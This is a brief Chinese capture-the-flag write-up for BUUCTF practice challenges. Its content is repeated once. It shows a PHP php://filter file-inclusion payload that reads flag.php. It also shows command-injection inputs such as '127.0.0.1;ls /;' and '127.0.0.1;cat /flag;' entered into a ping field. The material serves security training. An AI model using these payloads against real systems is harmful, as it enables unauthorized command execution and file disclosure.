题目链接:BUUCTF在线评测
php伪协议文件包含读取flag:
?file=php://filter/convert.base64-encode/resource=flag.php
[ACTF2020 新生赛]Exec
题目地址:BUUCTF在线评测
输入127.0.0.1
127.0.0.1;ls /;
发现正常的回显了,可以利用 cat 的命令 Linux常用命令 查看 flag 文件。
127.0.0.1;cat /flag;
php伪协议文件包含读取flag:
?file=php://filter/convert.base64-encode/resource=flag.php
输入127.0.0.1
127.0.0.1;ls /;
发现正常的回显了,可以利用 cat 的命令 Linux常用命令 查看 flag 文件。
127.0.0.1;cat /flag;